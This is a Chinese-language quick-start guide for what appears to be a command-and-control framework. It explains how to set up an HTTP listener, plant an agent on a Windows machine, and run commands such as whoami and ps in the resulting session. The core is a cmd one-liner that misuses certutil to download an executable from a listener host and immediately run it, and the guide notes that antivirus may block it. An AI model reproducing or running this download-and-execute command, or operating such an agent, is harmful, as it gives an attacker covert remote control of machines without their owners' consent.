快速开始
1. 新建监听器
进入监听管理页面,点击右边的创建监听器。
监听器名称输入如:http,
监听器端口输入如:1338 , 请确保输入的端口没有被使用和有权限监听。
协议类型选择HTTP
2. 安装探针
在监听器页面,选择安装监听器操作,在弹出的对话框中选择根据实际情况选择对应的命令执行。
在windows下有杀毒软件可能会被拦截。
这里我选择的windows,在cmd中执行如下的命令
certutil -urlcache -gmt -split -f http://ip:1338/d/izdkjhzy izdkjhzy.exe && izdkjhzy.exe agent -u http://ip:1338 -s 83wgnp0d
上面的命令先利用certutil 下载Agent,izdkjhzy
为服务端第一次启动时随机生成的文件名.
再启动agent 子命令,其中83wgnp0d
是Agent
和服务端通信加密密钥,也是服务端第一次启动时随机生成。
3. 会话操作
如果前面操作顺利,那么将会在服务端管理平台自动生成一条会话记录
在会话操作中选择控制台,进入命令下发选项卡可以执行对应的命令,下面的截图是执行了whoami
命令和ps
命令。
默认情况下心跳时间为5s, 可以使用sleep
命令进行修改如输入sleep 1
,将会将心跳时间修改为1s